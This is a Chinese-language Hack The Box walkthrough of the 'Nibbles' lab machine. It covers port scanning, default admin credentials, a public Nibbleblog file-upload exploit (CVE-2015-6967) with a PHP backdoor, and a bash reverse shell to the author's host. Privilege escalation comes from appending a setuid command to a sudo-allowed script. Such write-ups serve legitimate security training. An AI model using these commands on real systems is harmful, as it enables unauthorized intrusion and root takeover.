Nibbles-htb-writeup

0x00 靶场技能介绍

章节技能：网页源码查看、默认口令搜集、CVE-2015-6967、远程文件base64格式传输、LinEnum.sh工具使用、unzip文件解压、echo命令输出字符到bash脚本中

参考链接：无

0x01 用户权限获取

1、我们首先启动下靶机，获取下靶机IP地址：10.10.10.75

2、这里参照B站红笔up的方法进行端口扫描，加快下扫描进度

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -min-rate 10000 -p- 10.10.10.75
[sudo] kali 的密码：
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-04 15:21 CST
Nmap scan report for 10.10.10.75
Host is up (0.30s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 10.05 seconds

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -min-rate 10000 -p- -sU 10.10.10.75
[sudo] kali 的密码：
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-04 15:22 CST
Warning: 10.10.10.75 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.75
Host is up (0.30s latency).
All 65535 scanned ports on 10.10.10.75 are in ignored states.
Not shown: 65457 open|filtered udp ports (no-response), 78 closed udp ports (port-unreach)

Nmap done: 1 IP address (1 host up) scanned in 75.33 seconds

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -sT -sV -O -p22,80 10.10.10.75
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-04 15:25 CST
Nmap scan report for 10.10.10.75
Host is up (0.29s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.12 (96%), Linux 3.13 (96%), Linux 3.2 - 4.9 (96%), Linux 4.8 (96%), Linux 4.4 (95%), Linux 4.9 (95%), Linux 3.16 (95%), Linux 3.18 (95%), Linux 3.8 - 3.11 (95%), Linux 4.2 (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.03 seconds

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap --script=vuln -p22,80 10.10.10.75
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-04 15:25 CST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.

Nmap done: 1 IP address (1 host up) scanned in 347.37 seconds

3、这样的篇幅可能有点长，但是为了以后的OSCP，还是按照这个方法来吧。

4、通过nmap扫描，并没有发现什么特别有用的信息，那就先看下80端口是什么服务吧。

5、首页什么信息也没有，看下首页源代码吧

<!-- /nibbleblog/ directory. Nothing interesting here! -->

6、发现了一个目录路径，尝试访问下看看

7、看着像是一个博客的网站，暂时首页看不出来什么，先目录扫描下吧

┌──(kali㉿kali)-[~]
└─$ dirsearch -u http://10.10.10.75/nibbleblog/

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /home/kali/.dirsearch/reports/10.10.10.75/-nibbleblog-_23-12-04_15-58-43.txt

Error Log: /home/kali/.dirsearch/logs/errors-23-12-04_15-58-43.log

Target: http://10.10.10.75/nibbleblog/

[15:58:44] Starting: 
                         
[15:59:08] 200 -    1KB - /nibbleblog/COPYRIGHT.txt                         
[15:59:11] 200 -    5KB - /nibbleblog/README                                
[15:59:13] 200 -   34KB - /nibbleblog/LICENSE.txt                           
[15:59:20] 301 -  321B  - /nibbleblog/admin  ->  http://10.10.10.75/nibbleblog/admin/
[15:59:21] 200 -    2KB - /nibbleblog/admin/                                
[15:59:21] 200 -    1KB - /nibbleblog/admin.php
[15:59:21] 403 -  312B  - /nibbleblog/admin/.htaccess                       
[15:59:21] 200 -    2KB - /nibbleblog/admin/?/login                         
[15:59:22] 301 -  332B  - /nibbleblog/admin/js/tinymce  ->  http://10.10.10.75/nibbleblog/admin/js/tinymce/
[15:59:22] 200 -    2KB - /nibbleblog/admin/js/tinymce/                     
[15:59:47] 200 -    1KB - /nibbleblog/content/                              
[15:59:48] 301 -  323B  - /nibbleblog/content  ->  http://10.10.10.75/nibbleblog/content/
[16:00:02] 200 -    3KB - /nibbleblog/index.php                             
[16:00:02] 200 -    3KB - /nibbleblog/index.php/login/                      
[16:00:02] 200 -   78B  - /nibbleblog/install.php                           
[16:00:04] 301 -  325B  - /nibbleblog/languages  ->  http://10.10.10.75/nibbleblog/languages/
[16:00:20] 301 -  323B  - /nibbleblog/plugins  ->  http://10.10.10.75/nibbleblog/plugins/
[16:00:20] 200 -    4KB - /nibbleblog/plugins/                              
[16:00:34] 301 -  322B  - /nibbleblog/themes  ->  http://10.10.10.75/nibbleblog/themes/
[16:00:34] 200 -    2KB - /nibbleblog/themes/                               
[16:00:36] 200 -    2KB - /nibbleblog/update.php                            

Task Completed

8、这里发现了一个路径文件，查看下

http://10.10.10.75/nibbleblog/README

====== Nibbleblog ======
Version: v4.0.3
Codename: Coffee
Release date: 2014-04-01

Site: http://www.nibbleblog.com
Blog: http://blog.nibbleblog.com
Help & Support: http://forum.nibbleblog.com
Documentation: http://docs.nibbleblog.com

===== Social =====
* Twitter: http://twitter.com/nibbleblog
* Facebook: http://www.facebook.com/nibbleblog
* Google+: http://google.com/+nibbleblog

===== System Requirements =====
* PHP v5.2 or higher
* PHP module - DOM
* PHP module - SimpleXML
* PHP module - GD
* Directory “content” writable by Apache/PHP

Optionals requirements

* PHP module - Mcrypt

===== Installation guide =====
1- Download the last version from http://nibbleblog.com
2- Unzip the downloaded file
3- Upload all files to your hosting or local server via FTP, Shell, Cpanel, others.
4- With your browser, go to the URL of your web. Example: www.domain-name.com
5- Complete the form
6- Done! you have installed Nibbleblog

===== About the author =====
Name: Diego Najar
E-mail: dignajar@gmail.com
Linkedin: http://www.linkedin.com/in/dignajar

===== Example Post =====
<h1>Lorem ipsum dolor sit amet</h1>
<p>ea tibique disputando qui. Utroque laboramus percipitur sea id, no oporteat constituto mea? Dico iracundia mnesarchum cum an, cu vidit albucius prodesset his. Facer primis essent ut quo, ea vivendo legendos assueverit vel, ne sed nonumes percipitur? No usu agam volutpat!</p>
<h2>An mutat docendi quo</h2>
<p>nusquam apeirian constituam ius cu? Et mel eripuit noluisse scriptorem, habeo dissentiet te qui, at veniam impedit deterruisset eam. Ne mollis aliquam sea, te vis tation inimicus ullamcorper, cum illum invenire id? Nam causae euripidis necessitatibus ex. Case ferri graece at vix. Usu platonem mediocritatem id, ullum salutatus at sed.</p>
<ol>
<li><strong>Graecis explicari vim cu</strong>. Vim simul tibique in, bonorum officiis maluisset eam an? Ut senserit argumentum pri, mei ut unum tollit labores. Mea tation nusquam detracto et. Ius quis disputationi an!</li>
<li><strong>Cu ignota inermis pri</strong>. Percipit sadipscing eu has. Ipsum laoreet suscipiantur nam in, ius probo rebum explicari cu. Doming aliquam tractatos usu in, sea tation feugiat adversarium te, at modus virtute antiopam per. Sit at ipsum atqui viderer, te vim dolores volutpat constituam.</li>
</ol>
<p>Eum malorum appellantur in, qui ad contentiones consequuntur interpretaris. Cu aeque gloriatur scriptorem vim! Fugit admodum sed ne? Natum scripta intellegebat sit ut, aeque forensibus ei eam. Mazim delicata ius id, usu at idque delicata perpetua. Mollis vidisse reprimique te has, oblique graecis voluptaria vis in. Sed ea aliquam indoctum, duo at hinc mucius, ex iudicabit consulatu mel.</p>
<p>Eu nisl debet convenire nam, et epicurei periculis democritum est, nam eu stet elitr oratio. Eam iriure virtute equidem in, ei summo officiis dignissim nec! Et nam soleat fuisset, doming fastidii voluptatum ea ius, errem volutpat cum eu! Ex detracto assueverit cum. An eos graeco utamur, veri audire his no. Possit dissentias ei mei, quidam efficiantur delicatissimi est id, vel iuvaret adipisci mnesarchum id.</p>
<pre>git clone [git-repo-url] nibbleblog<br />cd nibbleblog<br />npm i -d<br />mkdir -p public/files/{md,html,pdf}</pre>
<p>An mutat docendi quo, nusquam apeirian constituam ius cu? Et mel eripuit noluisse scriptorem, habeo dissentiet te qui, at veniam impedit deterruisset eam. Ne mollis aliquam sea, te vis tation inimicus ullamcorper, cum illum invenire id? Nam causae euripidis necessitatibus ex. Case ferri graece at vix. Usu platonem mediocritatem id, ullum salutatus at sed.</p>
<p>Graecis explicari vim cu. Vim simul tibique in, bonorum officiis maluisset eam an? Ut senserit argumentum pri, mei ut unum tollit labores. Mea tation nusquam detracto et. Ius quis disputationi an!</p>
<pre><code data-language="php">&lt;?php
	echo "Hello Nibbleblog";
	$tmp = array(1,2,3);
	foreach($tmp as $number)
		echo $number;
?&gt;</code></pre>
<h2>How to install Git</h2>
<p>An mutat docendi quo, nusquam apeirian constituam ius cu? Et mel eripuit noluisse scriptorem, habeo dissentiet te qui, at veniam impedit deterruisset eam. Ne mollis aliquam sea, te vis tation inimicus ullamcorper, cum illum invenire id? Nam causae euripidis necessitatibus ex. Case ferri graece at vix. Usu platonem mediocritatem id, ullum salutatus at sed.</p>
<pre class="nb-console">sudo yum install git</pre>
<p>An mutat docendi quo, nusquam apeirian constituam ius cu? Et mel eripuit noluisse scriptorem, habeo dissentiet te qui, at veniam impedit deterruisset eam. Ne mollis aliquam sea, te vis tation inimicus ullamcorper.</p>

9、至此，我们知道了两个重要信息，该cms是Nibbleblog，版本号是 v4.0.3

10、通过目录扫描还获取到以下几个信息

http://10.10.10.75/nibbleblog/update.php
访问默认重置数据库

http://10.10.10.75/nibbleblog/content/private/config.xml
获取到两个信息：admin@nibbles.com 和 noreply@10.10.10.134

11、通过检索该 nibbleblog 4.0.3 exploit github关键词，我们发现了1个当前版本的文件上传的漏洞

12、瞅了下这个漏洞是任意文件上传的漏洞，前提是获取到账号密码

https://github.com/dix0nym/CVE-2015-6967

13、看到这个exp里有个默认的账号密码，我们先试试把，看看这个账号密码对不对

--username admin --password nibbles

14、成功进入后台，那我们开始用一下呢个exp把

┌──(kali㉿kali)-[~/桌面/CVE-2015-6967-main]
└─$ python3 exploit.py --url http://10.10.10.75/nibbleblog/ --username admin --password nibbles --payload qsd-php-backdoor.php 
[+] Login Successful.
[+] Upload likely successfull.
[+] Exploit launched, check for shell.

15、在exp的源码路径也放了上传的shell地址，我们直接利用上传的shell，构造个反弹shell把

def execute_shell(session, nibbleURL):
	exploitURL = f"{nibbleURL}content/private/plugins/my_image/image.php"
	exploitResp = session.get(exploitURL)

	if exploitResp.status_code == 200:
		print('[+] Exploit launched, check for shell.')
	else:
		print('[!] Exploit failed.')

16、至此，我们成功的获取到了一个user.txt

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 10086
listening on [any] 10086 ...

http://10.10.10.75/nibbleblog//content/private/plugins/my_image/image.php
bash -c "bash -i >& /dev/tcp/10.10.14.7/10086 0>&1"

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 10086
listening on [any] 10086 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.75] 54960
bash: cannot set terminal process group (1354): Inappropriate ioctl for device
bash: no job control in this shell
nibbler@Nibbles:/var/www/html/nibbleblog/content/private/plugins/my_image$ 

nibbler@Nibbles:/var/www/html/nibbleblog/content/private/plugins/my_image$ cd ~
<ml/nibbleblog/content/private/plugins/my_image$ cd~                         
nibbler@Nibbles:/home/nibbler$ ls
ls
personal.zip
user.txt
nibbler@Nibbles:/home/nibbler$ cat user.txt
cat user.txt
d92d4dcd89654ab9fd78eadbbcda01c5
nibbler@Nibbles:/home/nibbler$

0x02 系统权限获取

17、在上面的步骤中我们发现首页根目录放着一个压缩包，搞下来看看

nibbler@Nibbles:/home/nibbler$ md5sum personal.zip
md5sum personal.zip
dbc3f2c0351447fade589289d60335ae  personal.zip
nibbler@Nibbles:/home/nibbler$ cat personal.zip | base64 -w 0;echo
cat personal.zip | base64 -w 0;echo
UEsDBAoAAAA******************wEAACYGAAAAAA==
nibbler@Nibbles:/home/nibbler$

┌──(kali㉿kali)-[~/桌面]
└─$ >....                                                   
e27432 ********* GAAAAAA== | base64 -d > personal.zip

┌──(kali㉿kali)-[~/桌面]
└─$ md5sum personal.zip 
dbc3f2c0351447fade589289d60335ae  personal.zip

18、这个方法还是我在HTB的其他靶机上学到的，一般读取一些小文件，如 id_rsa 文件，解压缩，看看这个文件里是什么东西吧。

Tecmint_monitor.sh 
Written for Tecmint.com for the post www.tecmint.com/linux-server-health-monitoring-script

19、整体看了下是一个监控的小脚本工具。

20、由于我没有通过ssh登录的这个账号，我也不知道该账号的密码，如果直接sudo -l 的话，会让我输入密码，这里我直接使用LinEnum.sh工具进行全部信息枚举下吧。

┌──(kali㉿kali)-[~/桌面/test]
└─$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...


nibbler@Nibbles:/tmp$ wget http://10.10.14.7:8000/LinEnum.sh
wget http://10.10.14.7:8000/LinEnum.sh
--2023-12-04 04:12:05--  http://10.10.14.7:8000/LinEnum.sh
Connecting to 10.10.14.7:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 46631 (46K) [text/x-sh]
Saving to: 'LinEnum.sh'

LinEnum.sh            0%[                    ]       0  --.-KB/s             LinEnum.sh           43%[=======>            ]  19.67K  60.3KB/s             LinEnum.sh           91%[=================>  ]  41.50K  68.0KB/s             LinEnum.sh          100%[===================>]  45.54K  74.6KB/s    in 0.6s    

2023-12-04 04:12:06 (74.6 KB/s) - 'LinEnum.sh' saved [46631/46631]

nibbler@Nibbles:/tmp$

/home/nibbler/personal/stuff/monitor.sh

22、在这里其实已经知道该杂提权了，结合前面的呢个压缩包和路劲，妥妥的解压再运行啊（实际打靶环节中，我癔症了会，没有立马的想到，毕竟这也太直接了吧）！

23、方法知道了，那就开始提权吧

nibbler@Nibbles:/home/nibbler$ ls
ls
personal.zip  user.txt
nibbler@Nibbles:/home/nibbler$ unzip personal.zip
unzip personal.zip
Archive:  personal.zip
   creating: personal/
   creating: personal/stuff/
  inflating: personal/stuff/monitor.sh  
nibbler@Nibbles:/home/nibbler$
nibbler@Nibbles:/home/nibbler$ cd /personal/stuff
cd /personal/stuff
nibbler@Nibbles:/home/nibbler/personal/stuff$ echo "chmod u+s /bin/bash" >> monitor.sh
<er/personal/stuff$ echo "chmod u+s /bin/bash" >> mnitor.sh
nibbler@Nibbles:/home/nibbler/personal/stuff$ cat monitor.sh
cat monitor.sh
...........................
# Remove Temporary Files
rm /tmp/osrelease /tmp/who /tmp/ramcache /tmp/diskusage
}
fi
shift $(($OPTIND -1))
chmod u+s /bin/bash
nibbler@Nibbles:/home/nibbler/personal/stuff$ sudo ./monitor.sh
sudo ./monitor.sh
'unknown': I need something more specific.
/home/nibbler/personal/stuff/monitor.sh: 26: /home/nibbler/personal/stuff/monitor.sh: [[: not found
/home/nibbler/personal/stuff/monitor.sh: 36: /home/nibbler/personal/stuff/monitor.sh: [[: not found
/home/nibbler/personal/stuff/monitor.sh: 43: /home/nibbler/personal/stuff/monitor.sh: [[: not found
nibbler@Nibbles:/home/nibbler/personal/stuff$ ls -la /bin/bash
ls -la /bin/bash
-rwsr-xr-x 1 root root 1037528 May 16  2017 /bin/bash
nibbler@Nibbles:/home/nibbler/personal/stuff$ /bin/bash -p
/bin/bash -p
bash-4.3# id
id
uid=1001(nibbler) gid=1001(nibbler) euid=0(root) groups=1001(nibbler)
bash-4.3# ca /root/root.txt
ca /root/root.txt
bash: ca: command not found
bash-4.3# cat /root/root.txt
cat /root/root.txt
b19cb54ad99daab54d7efade799476f9
bash-4.3# 

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/121